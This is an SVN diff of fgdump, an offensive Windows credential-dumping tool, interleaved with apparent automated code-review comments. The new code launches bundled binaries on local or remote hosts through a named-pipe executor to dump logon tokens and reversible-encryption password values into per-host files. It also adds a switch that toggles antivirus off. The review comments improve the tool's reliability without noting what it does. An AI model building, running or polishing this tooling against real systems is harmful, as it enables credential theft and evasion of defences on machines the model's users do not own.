+	if (!objRevDump.Execute(fgdumpMain->lpszFGExecPath, lpszCacheDumpRemotePath, lpszServer, fgdumpMain->lpszRevDumpExeName, lpszPipeName))
+	{
+		Log.CachedReportError(nCacheID, CRITICAL, "Failed to dump reversible encryption values\n");
+		return false;
+	}
+
+	return true;
+}
+
 bool HostDumper::RunProtectedStorageDump(char* lpszTempPath, char* lpszUser, char* lpszPassword, char* lpszPipeName)
 {
 	ProtectedStorageControl objPStgDump(nCacheID);
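Review bot: Both RunWhosThere and RunRevDump ignore the CopyFile result before calling Execute, so when the copy to lpszRemotePath fails the run is still attempted and the caller's GetLastError() reports whatever failed afterwards rather than the copy; a guard such as `if (!CopyFile(fgdumpMain->lpszRevDumpPath, lpszRemotePath, FALSE)) { Log.CachedReportError(nCacheID, CRITICAL, "Failed to copy revdump to %s\n", lpszRemotePath); return false; }` keeps the error attributable. The lpszTempPath parameter is unused in both bodies, and both pass lpszCacheDumpRemotePath as the dump path for tools that are not cachedump — if that member is simply the shared remote directory, a more general name or a comment saying so would avoid the question. The two functions differ only in the control class, the path members and the log text, so one helper parameterised on those would remove the duplication. RunProtectedStorageDump, whose start is visible at the end of the hunk, continues outside it.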
Index: fgdump.vcproj
===================================================================
--- fgdump.vcproj	(revision 1246)
+++ fgdump.vcproj	(revision 1355)
@@ -249,6 +249,10 @@
 				>
 			</File>
 			<File
+				RelativePath=".\RevDumpControl.cpp"
+				>
+			</File>
+			<File
 				RelativePath=".\ServiceControl.cpp"
 				>
 			</File>
@@ -293,6 +297,10 @@
 				>
 			</File>
 			<File
+				RelativePath=".\WhosThereControl.cpp"
+				>
+			</File>
+			<File
 				RelativePath=".\XGetopt.cpp"
 				>
 			</File>
@@ -375,6 +383,10 @@
 				>
 			</File>
 			<File
+				RelativePath=".\RevDumpControl.h"
+				>
+			</File>
+			<File
 				RelativePath=".\ServiceControl.h"
 				>
 			</File>
@@ -403,6 +415,10 @@
 				>
 			</File>
 			<File
+				RelativePath=".\WhosThereControl.h"
+				>
+			</File>
+			<File
 				RelativePath=".\XGetopt.h"
 				>
 			</File>
@@ -466,6 +482,10 @@
 			>
 		</File>
 		<File
+			RelativePath=".\revdump.exe"
+			>
+		</File>
+		<File
 			RelativePath=".\servpw.exe"
 			>
 		</File>
@@ -473,6 +493,10 @@
 			RelativePath=".\servpw64.exe"
 			>
 		</File>
+		<File
+			RelativePath=".\whosthere.exe"
+			>
+		</File>
 	</Files>
 	<Globals>
 	</Globals>
Index: fgexec/Release/fgexec.exe
===================================================================
Cannot display: file marked as a binary type.
svn:mime-type = application/octet-stream
Index: fgexec/Debug/fgexec.exe
===================================================================
Cannot display: file marked as a binary type.
svn:mime-type = application/octet-stream
Index: RevDumpControl.cpp
===================================================================
--- RevDumpControl.cpp	(revision 0)
+++ RevDumpControl.cpp	(revision 1355)
@@ -0,0 +1,136 @@
+/******************************************************************************
+fgdump - by fizzgig and the foofus.net group
+Copyright (C) 2010 by JoMo-Kun
+http://www.foofus.net
+
+This program is free software; you can redistribute it and/or
+modify it under the terms of the GNU General Public License
+as published by the Free Software Foundation; either version 2
+of the License, or (at your option) any later version.
+
+This program is distributed in the hope that it will be useful,
+but WITHOUT ANY WARRANTY; without even the implied warranty of
+MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.  See the
+GNU General Public License for more details.
+
+You should have received a copy of the GNU General Public License
+along with this program; if not, write to the Free Software
+Foundation, Inc., 51 Franklin Street, Fifth Floor, Boston, MA  02110-1301, USA.
+******************************************************************************/
+#include "StdAfx.h"
+#include "RevDumpControl.h"
+#include "Process.h"
+
+RevDumpControl::RevDumpControl(LONG nCacheID)
+{
+	m_nCacheID = nCacheID;
+}
+
+
+RevDumpControl::~RevDumpControl(void)
+{
+
+}
+
+bool RevDumpControl::Execute(const char* lpszPSExecPath, const char* lpszDumpPath, char* lpszMachine, char* lpszExeName, char* lpszPipeName)
+{
+	char* lpszCmdLineFormat;
+	int nArgSize;
+	char* lpszStopCmdLine;
+	char* lpszParams;
+	bool result = false;
+	
+	if (lpszPipeName == NULL)
+	{
+		// Set the local RevDump path
+		lpszCmdLineFormat = "%s\\%s";
+		nArgSize = _scprintf(lpszCmdLineFormat, lpszDumpPath, lpszExeName);
+		lpszStopCmdLine = new char[nArgSize + 1];
+		memset(lpszStopCmdLine, 0, nArgSize + 1);
+		_snprintf(lpszStopCmdLine, nArgSize, lpszCmdLineFormat, lpszDumpPath, lpszExeName);
+
+		// Now set the parameters
+		lpszCmdLineFormat = " -l";
+		nArgSize = strlen(lpszCmdLineFormat);
+		lpszParams = new char[nArgSize + 1];
+		memset(lpszParams, 0, nArgSize + 1);
+		_snprintf(lpszParams, nArgSize, lpszCmdLineFormat);
+	}
+	else
+	{
+		lpszStopCmdLine = new char[strlen(lpszPSExecPath) + 1];
+		memset(lpszStopCmdLine, 0, strlen(lpszPSExecPath) + 1);
+		strncpy(lpszStopCmdLine, lpszPSExecPath, strlen(lpszPSExecPath));
+
+		lpszCmdLineFormat = " -c -n %s %s \"%s\\%s \" -l";
+
+		nArgSize = _scprintf(lpszCmdLineFormat, lpszPipeName, lpszMachine, lpszDumpPath, lpszExeName);
+		lpszParams = new char[nArgSize + 1];
+		memset(lpszParams, 0, nArgSize + 1);
+		_snprintf(lpszParams, nArgSize, lpszCmdLineFormat, lpszPipeName, lpszMachine, lpszDumpPath, lpszExeName);
+	}
+
+	try
+	{
+		Process p;
+
+		HANDLE hProcess = p.CreateProcess(lpszStopCmdLine, lpszParams);
+		if (hProcess != 0)
+		{
+			DWORD dwResult = WaitForSingleObject(hProcess, 1200000);	// Wait 20 minutes for process to complete
+			if (dwResult != WAIT_OBJECT_0)
+			{
+				Log.CachedReportError(m_nCacheID, CRITICAL, "Warning: RevDump did not complete in a timely manner - exiting");
+				result = false;
+			}
+			else
+			{
+				// Read from process's output
+				char* szResult;
+				int nSize = 65535;
+
+				szResult = new char[nSize];
+				memset(szResult, 0, nSize);
+				p.ReadFromPipe(&szResult, nSize);
+
+				// Was it successful?
+				if (strstr(szResult, "RevDump ") != NULL)
+				{
+					// Success
+					// Write results to a file
+					size_t nLen = strlen(lpszMachine) + 8;		// 8 chars accounts for ".revdump" extension
+					char* szTempFilename = new char[nLen + 1];
+					memset(szTempFilename, 0, nLen + 1);
+					_snprintf(szTempFilename, nLen, "%s.revdump", lpszMachine);
+
+					std::ofstream outputFile(szTempFilename, std::ios::out | std::ios::trunc);
+					outputFile.write((const char*)szResult, (DWORD)strlen(szResult));
+					outputFile.close();
+					delete [] szTempFilename;
+					Log.CachedReportError(m_nCacheID, CRITICAL, "Reversible encryption values dumped successfully\n", lpszMachine);
+					result = true;
+				}
+				else
+				{
+					// Failed
+					Log.CachedReportError(m_nCacheID, CRITICAL, "Failed to dump reversible encryption values (the text returned follows):\n%s", szResult);
+					result = false;
+				}
+
+				delete [] szResult;
+			}
+		}
+		else
+			result = false;
+	}
+	catch(...)
+	{
+		result = false;
+	}
+
+	delete [] lpszStopCmdLine;
+	delete [] lpszParams;
+
+	return result;
+}
+
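Review bot: The success log `Log.CachedReportError(m_nCacheID, CRITICAL, "Reversible encryption values dumped successfully\n", lpszMachine);` passes lpszMachine although the format has no conversion for it, and reports a success at CRITICAL; the intent looks like `"Reversible encryption values dumped successfully from %s\n"` at INFO, matching the neighbouring failure message that does consume its argument. szResult is only released on the normal path, so if ReadFromPipe or the ofstream write throws, the catch(...) swallows the exception and the 64 KB buffer leaks — a std::vector<char> for szResult and std::string for lpszStopCmdLine/lpszParams would remove all of the manual new/memset/delete and the string-literal-to-`char*` assignments. strstr on szResult also relies on a terminator, which holds only if ReadFromPipe never fills all nSize bytes; passing `nSize - 1` guarantees it. The catch(...) should at least log what was caught, since a silent false is indistinguishable from the other failure returns, and on WAIT_TIMEOUT the child is left running with hProcess never closed here — whether Process's destructor handles that is not visible in this diff.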
Index: Main.cpp
===================================================================
--- Main.cpp	(revision 1246)
+++ Main.cpp	(revision 1355)
@@ -24,12 +24,15 @@
 void Usage()
 {
 	printf("Usage:\n");
-	printf("%s [-?][-t][-c][-w][-s][-r][-v][-k][-o][-a][-O 32|64][-l logfile][-T threads] [{{-h Host | -f filename} -u Username -p Password | -H filename}]\n", "fgdump");
+	printf("%s [-?][-t][-e][-c][-w][-x][-y][-s][-r][-v][-k][-o][-a][-O 32|64][-l logfile][-T threads] [{{-h Host | -f filename} -u Username -p Password | -H filename}]\n", "fgdump");
 	printf("\t where Username and Password have administrator credentials\n");
 	printf("\t -? displays help (you're looking at it!)\n");
 	printf("\t -t will test for the presence of antivirus without actually running the password dumps\n");
+	printf("\t -e will toggle antivirus state (e.g. if enabled, then disable) \n");
 	printf("\t -c skips the cache dump\n");
 	printf("\t -w skips the password dump\n");
+	printf("\t -x performs the logon token dump\n");
+	printf("\t -y performs the reversible encryption value dump\n");
 	printf("\t -s performs the protected storage dump\n");
 	printf("\t -r forgets about existing pwdump/cachedump files. The default behavior is to skip a host if these files already exist.\n");
 	printf("\t -v makes output more verbose. Use twice for greater effect\n");
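Review bot: The new -e line ends with a space before the `\n` (`"... then disable) \n"`), which none of the other usage lines have. The text also does not say how -e relates to -t: both appear to put fgdump into an antivirus-only mode (SetToggleOnlyAV clears bFullRun, and the test-only setter writes `bFullRun = !bTestOnly`), and neither setter rejects the other, so the usage should state that -e runs no dumps and whether -t and -e may be combined. The enclosing Usage function continues outside the hunk.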
@@ -52,7 +55,7 @@
 
 	printf("fgDump 2.2.0 - fizzgig and the mighty group at foofus.net\n");
 	printf("*** THIS IS A BETA VERSION, YOU HAVE BEEN WARNED ***\n");
-	printf("Written to make j0m0kun's life just a bit easier\n");
+	printf("Written to make JoMo-Kun's life just a bit easier\n");
 	printf("Copyright(C) 2008 fizzgig and foofus.net\n");
 	printf("fgdump comes with ABSOLUTELY NO WARRANTY!\n");
 	printf("This is free software, and you are welcome to redistribute it\n");
@@ -64,7 +67,7 @@
 		printf("No parameters specified, doing a local dump. Specify -? if you are looking for help.\n");
 	}
 
-	while ((c = getopt(argc, argv, _T("h:tf:H:u:p:l:T:O:cwrvskoa?"))) != EOF)
+	while ((c = getopt(argc, argv, _T("h:tf:H:u:p:l:T:O:cwrvskoaexy?"))) != EOF)
 	{
 		switch(c)
 		{
@@ -77,6 +80,9 @@
 		case 't':
 			fgd.SetTestOnlyAV(true);	// Only check for AV
 			break;
+		case 'e':
+			fgd.SetToggleOnlyAV(true);	// Only toggle AV state
+			break;
 		case 'f':
 			if (strlen(optarg) > MAX_PATH)
 			{
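Review bot: `case 'e'` introduces a second exclusive mode alongside `case 't'`, and nothing in this hunk rejects `-t` and `-e` given together, so both `SetTestOnlyAV(true)` and `SetToggleOnlyAV(true)` end up set and which one wins is decided in code not visible here. Either reject the combination once option parsing finishes, or document the precedence on the case with a comment such as `// exclusive with -t; if both are given, <PRECEDENCE — confirm> takes effect`. The switch continues outside the hunk.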
@@ -111,6 +117,12 @@
 		case 'w':
 			fgd.SetSkipPWDump(true);
 			break;
+		case 'x':
+			fgd.SetSkipWhosThere(false);
+			break;
+		case 'y':
+			fgd.SetSkipRevDump(false);
+			break;
 		case 's':
 			fgd.SetSkipProtectedStorageDump(false);
 			break;
Index: fgdump.h
===================================================================
--- fgdump.h	(revision 1246)
+++ fgdump.h	(revision 1355)
@@ -52,21 +52,28 @@
 	char lpszPSServicePath[MAX_PATH + 15];
 	char lpszCacheDumpPath[MAX_PATH + 15];
 	char lpszCacheDump64Path[MAX_PATH + 15];
+	char lpszWhosTherePath[MAX_PATH + 15];
+	char lpszRevDumpPath[MAX_PATH + 15];
 	char lpszPStoragePath[MAX_PATH + 15];
 	char lpszFGExecPath[MAX_PATH + 15];
 	char lpszCacheDumpExeName[MAX_EXE_NAME_LEN + 1];
 	char lpszCacheDump64ExeName[MAX_EXE_NAME_LEN + 1];
+	char lpszWhosThereExeName[MAX_EXE_NAME_LEN + 1];
+	char lpszRevDumpExeName[MAX_EXE_NAME_LEN + 1];
 	char lpszFgExecExeName[MAX_EXE_NAME_LEN + 1];
 
-	bool bFullRun, bRunPwdump, bRunCachedump, bRunPStgDump, bSkipExisting, bContinueOnUnknownAV;
+	bool bFullRun, bRunPwdump, bRunWhosThere, bRunRevDump, bRunCachedump, bRunPStgDump, bSkipExisting, bContinueOnUnknownAV, bToggleAV;
 	bool bSkipPwdumpHistory;
 	bool bRunLocal;
 	bool bSkipAVCheck;
 	int	 nOSBits;
 
 	void SetTestOnlyAV(bool bTestOnly);
+	void SetToggleOnlyAV(bool bToggleOnly);
 	void SetSkipCacheDump(bool bSkip);
 	void SetSkipPWDump(bool bSkip);
+	void SetSkipWhosThere(bool bSkip);
+	void SetSkipRevDump(bool bSkip);
 	void SetSkipProtectedStorageDump(bool bSkip);
 	void SetIgnoreExistingFiles(bool bIgnoreExisting);
 	void SetHostfileName(char* szFile);
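Review bot: The three new flags `bRunWhosThere`, `bRunRevDump` and `bToggleAV` are appended to a single `bool` declaration that now holds nine names, while the flags just below (`bSkipPwdumpHistory`, `bRunLocal`, `bSkipAVCheck`) get one declaration each; declaring them one per line, with a short trailing comment on what each governs, keeps the header readable and future diffs reviewable. The header shows no initializer for the new members, and the `-x`/`-y` switches in Main.cpp only ever call the setters with `false`, so the default must come from a constructor outside this diff — worth confirming it initializes all three, since an uninitialized `bool` member would make the new dumps run nondeterministically. The class body continues outside the hunk.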
Index: HostDumper.h
===================================================================
--- HostDumper.h	(revision 1246)
+++ HostDumper.h	(revision 1355)
@@ -58,6 +58,8 @@
 	bool bRunLocal;
 
 	bool RunCacheDump(char* lpszTempPath, bool bIs64Bit, char* lpszPipeName = NULL);
+	bool RunWhosThere(char* lpszTempPath, char* lpszPipeName = NULL);
+	bool RunRevDump(char* lpszTempPath, char* lpszPipeName = NULL);
 	bool RunProtectedStorageDump(char* lpszTempPath, char* lpszUser, char* lpszPassword, char* lpszPipeName);
 	bool StopAndRemoveFGExec(bool* bIsFgexecStillInstalled);
 	bool InstallAndStartFGExec(const char* lpszPipeName, bool* bIsFgexecStillInstalled);
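Review bot: `RunWhosThere` and `RunRevDump` take `char* lpszTempPath` and `char* lpszPipeName`, although the sibling `InstallAndStartFGExec` two lines below already takes `const char* lpszPipeName`; unless the implementations mutate these buffers, declare them `const char*` so callers holding `const` strings need no casts: `bool RunWhosThere(const char* lpszTempPath, const char* lpszPipeName = NULL);` and likewise for `RunRevDump`. The defaulted `lpszPipeName = NULL` mirrors `RunCacheDump`, so the local/remote selection convention stays consistent. The class body continues outside the hunk.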
Index: WhosThereControl.h
===================================================================
--- WhosThereControl.h	(revision 0)
+++ WhosThereControl.h	(revision 1355)
@@ -0,0 +1,37 @@
+/******************************************************************************
+fgdump - by fizzgig and the foofus.net group
+Copyright (C) 2009 by JoMo-Kun
+http://www.foofus.net
+
+This program is free software; you can redistribute it and/or
+modify it under the terms of the GNU General Public License
+as published by the Free Software Foundation; either version 2
+of the License, or (at your option) any later version.
+
+This program is distributed in the hope that it will be useful,
+but WITHOUT ANY WARRANTY; without even the implied warranty of
+MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.  See the
+GNU General Public License for more details.
+
+You should have received a copy of the GNU General Public License
+along with this program; if not, write to the Free Software
+Foundation, Inc., 51 Franklin Street, Fifth Floor, Boston, MA  02110-1301, USA.
+******************************************************************************/
+#pragma once
+#ifndef _WHOSTHERECONTROL_H
+#define _WHOSTHERECONTROL_H
+
+class WhosThereControl
+{
+public:
+	WhosThereControl(LONG nCacheID = -1);
+	~WhosThereControl(void);
+
+	bool Execute(const char* lpszPSExecPath, const char* lpszDumpPath, char* lpszMachine, char* lpszExeName, char* lpszPipeName = NULL);
+
+private:
+	LONG m_nCacheID;
+
+};
+
+#endif
\ No newline at end of file
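Review bot: `Execute` declares `lpszMachine`, `lpszExeName` and `lpszPipeName` as `char*`, yet the implementation in WhosThereControl.cpp only reads them (they are passed to `_scprintf`, `_snprintf` and `strlen`), so they should be `const char*` like the first two parameters: `bool Execute(const char* lpszPSExecPath, const char* lpszDumpPath, const char* lpszMachine, const char* lpszExeName, const char* lpszPipeName = NULL);`. The `#pragma once` and the `_WHOSTHERECONTROL_H` guard are redundant, and a macro beginning with an underscore followed by a capital letter is a reserved identifier — keep one of the two, with a project-style name if the guard stays. The header uses `LONG` without including anything, so it silently depends on the including file having pulled in the Windows headers first; the file also lacks a trailing newline.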
Index: resource.h
===================================================================
--- resource.h	(revision 1246)
+++ resource.h	(revision 1355)
@@ -3,24 +3,21 @@
 // Used by fgdump.rc
 //
 #define IDR_PSTGDUMP                    130
-#define IDR_BIN1                        152
-#define IDR_BIN2                        157
-#define IDR_BIN3                        173
-#define IDR_BIN4                        180
 #define IDR_CACHEDUMP                   181
-#define IDR_BIN6                        182
 #define IDR_CACHEDUMP64                 182
 #define IDR_PWDUMP                      183
-#define IDR_BIN5                        184
 #define IDR_FGEXEC                      184
+#define IDR_WHOSTHERE                   194
+#define IDR_REVDUMP                     195
+#define IDR_BIN1                        199
 
 // Next default values for new objects
 // 
 #ifdef APSTUDIO_INVOKED
 #ifndef APSTUDIO_READONLY_SYMBOLS
-#define _APS_NEXT_RESOURCE_VALUE        185
+#define _APS_NEXT_RESOURCE_VALUE        200
 #define _APS_NEXT_COMMAND_VALUE         40001
 #define _APS_NEXT_CONTROL_VALUE         1001
-#define _APS_NEXT_SYMED_VALUE           101
+#define _APS_NEXT_SYMED_VALUE           103
 #endif
 #endif
Index: Release/fgdump.exe
===================================================================
Cannot display: file marked as a binary type.
svn:mime-type = application/octet-stream
Index: Debug/fgdump.exe
===================================================================
Cannot display: file marked as a binary type.
svn:mime-type = application/octet-stream
Index: whosthere.exe
===================================================================
Cannot display: file marked as a binary type.
svn:mime-type = application/octet-stream

Property changes on: whosthere.exe
___________________________________________________________________
Added: svn:mime-type
   + application/octet-stream

Index: WhosThereControl.cpp
===================================================================
--- WhosThereControl.cpp	(revision 0)
+++ WhosThereControl.cpp	(revision 1355)
@@ -0,0 +1,136 @@
+/******************************************************************************
+fgdump - by fizzgig and the foofus.net group
+Copyright (C) 2009 by JoMo-Kun
+http://www.foofus.net
+
+This program is free software; you can redistribute it and/or
+modify it under the terms of the GNU General Public License
+as published by the Free Software Foundation; either version 2
+of the License, or (at your option) any later version.
+
+This program is distributed in the hope that it will be useful,
+but WITHOUT ANY WARRANTY; without even the implied warranty of
+MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.  See the
+GNU General Public License for more details.
+
+You should have received a copy of the GNU General Public License
+along with this program; if not, write to the Free Software
+Foundation, Inc., 51 Franklin Street, Fifth Floor, Boston, MA  02110-1301, USA.
+******************************************************************************/
+#include "StdAfx.h"
+#include "WhosThereControl.h"
+#include "Process.h"
+
+WhosThereControl::WhosThereControl(LONG nCacheID)
+{
+	m_nCacheID = nCacheID;
+}
+
+
+WhosThereControl::~WhosThereControl(void)
+{
+
+}
+
+bool WhosThereControl::Execute(const char* lpszPSExecPath, const char* lpszDumpPath, char* lpszMachine, char* lpszExeName, char* lpszPipeName)
+{
+	char* lpszCmdLineFormat;
+	int nArgSize;
+	char* lpszStopCmdLine;
+	char* lpszParams;
+	bool result = false;
+	
+	if (lpszPipeName == NULL)
+	{
+		// Set the local WhosThere path
+		lpszCmdLineFormat = "%s\\%s";
+		nArgSize = _scprintf(lpszCmdLineFormat, lpszDumpPath, lpszExeName);
+		lpszStopCmdLine = new char[nArgSize + 1];
+		memset(lpszStopCmdLine, 0, nArgSize + 1);
+		_snprintf(lpszStopCmdLine, nArgSize, lpszCmdLineFormat, lpszDumpPath, lpszExeName);
+
+		// Now set the parameters
+		lpszCmdLineFormat = " -l";
+		nArgSize = strlen(lpszCmdLineFormat);
+		lpszParams = new char[nArgSize + 1];
+		memset(lpszParams, 0, nArgSize + 1);
+		_snprintf(lpszParams, nArgSize, lpszCmdLineFormat);
+	}
+	else
+	{
+		lpszStopCmdLine = new char[strlen(lpszPSExecPath) + 1];
+		memset(lpszStopCmdLine, 0, strlen(lpszPSExecPath) + 1);
+		strncpy(lpszStopCmdLine, lpszPSExecPath, strlen(lpszPSExecPath));
+
+		lpszCmdLineFormat = " -c -n %s %s \"%s\\%s \" -l";
+
+		nArgSize = _scprintf(lpszCmdLineFormat, lpszPipeName, lpszMachine, lpszDumpPath, lpszExeName);
+		lpszParams = new char[nArgSize + 1];
+		memset(lpszParams, 0, nArgSize + 1);
+		_snprintf(lpszParams, nArgSize, lpszCmdLineFormat, lpszPipeName, lpszMachine, lpszDumpPath, lpszExeName);
+	}
+
+	try
+	{
+		Process p;
+
+		HANDLE hProcess = p.CreateProcess(lpszStopCmdLine, lpszParams);
+		if (hProcess != 0)
+		{
+			DWORD dwResult = WaitForSingleObject(hProcess, 1200000);	// Wait 20 minutes for process to complete
+			if (dwResult != WAIT_OBJECT_0)
+			{
+				Log.CachedReportError(m_nCacheID, CRITICAL, "Warning: WhosThere did not complete in a timely manner - exiting");
+				result = false;
+			}
+			else
+			{
+				// Read from process's output
+				char* szResult;
+				int nSize = 65535;
+
+				szResult = new char[nSize];
+				memset(szResult, 0, nSize);
+				p.ReadFromPipe(&szResult, nSize);
+
+				// Was it successful?
+				if (strstr(szResult, "the output format is") != NULL)
+				{
+					// Success
+					// Write results to a file
+					size_t nLen = strlen(lpszMachine) + 10;		// 10 chars accounts for ".whosthere" extension
+					char* szTempFilename = new char[nLen + 1];
+					memset(szTempFilename, 0, nLen + 1);
+					_snprintf(szTempFilename, nLen, "%s.whosthere", lpszMachine);
+
+					std::ofstream outputFile(szTempFilename, std::ios::out | std::ios::trunc);
+					outputFile.write((const char*)szResult, (DWORD)strlen(szResult));
+					outputFile.close();
+					delete [] szTempFilename;
+					Log.CachedReportError(m_nCacheID, CRITICAL, "Logon tokens dumped successfully\n", lpszMachine);
+					result = true;
+				}
+				else
+				{
+					// Failed
+					Log.CachedReportError(m_nCacheID, CRITICAL, "Failed to dump logon tokens (the text returned follows):\n%s", szResult);
+					result = false;
+				}
+
+				delete [] szResult;
+			}
+		}
+		else
+			result = false;
+	}
+	catch(...)
+	{
+		result = false;
+	}
+
+	delete [] lpszStopCmdLine;
+	delete [] lpszParams;
+
+	return result;
+}
+
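Review bot: The success log `Log.CachedReportError(m_nCacheID, CRITICAL, "Logon tokens dumped successfully\n", lpszMachine);` passes `lpszMachine` to a format string with no conversion, so the host name is silently dropped (the reversible-encryption counterpart earlier in this diff has the same mismatch); either use `"Logon tokens dumped successfully on %s\n"` or drop the argument, and a successful run should not be reported at `CRITICAL`. `szResult` is `nSize` bytes and is null-terminated only by the preceding `memset`, so if `ReadFromPipe` can fill all `nSize` bytes the following `strstr` and `strlen` read past the allocation — allocate `nSize + 1`, zero it and keep passing `nSize`, or confirm `ReadFromPipe`'s contract, since it receives `&szResult` and may reallocate the buffer. The `_snprintf(..., nArgSize, ...)` calls likewise rely on the `memset` for their terminator because `_scprintf` returns exactly `nArgSize` characters; pass `nArgSize + 1` as the count. `szResult` and `szTempFilename` leak if anything throws between their `new[]` and `delete[]` because `catch(...)` swallows the exception, and `hProcess` is never closed in this function (whether `Process` owns it is not visible); holding the buffers in `std::string`/`std::vector<char>` would remove both the leaks and the terminator question. The string literals assigned to the non-const `char* lpszCmdLineFormat` should be `const char*`.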
Index: revdump.exe
===================================================================
Cannot display: file marked as a binary type.
svn:mime-type = application/octet-stream

Property changes on: revdump.exe
___________________________________________________________________
Added: svn:mime-type
   + application/octet-stream

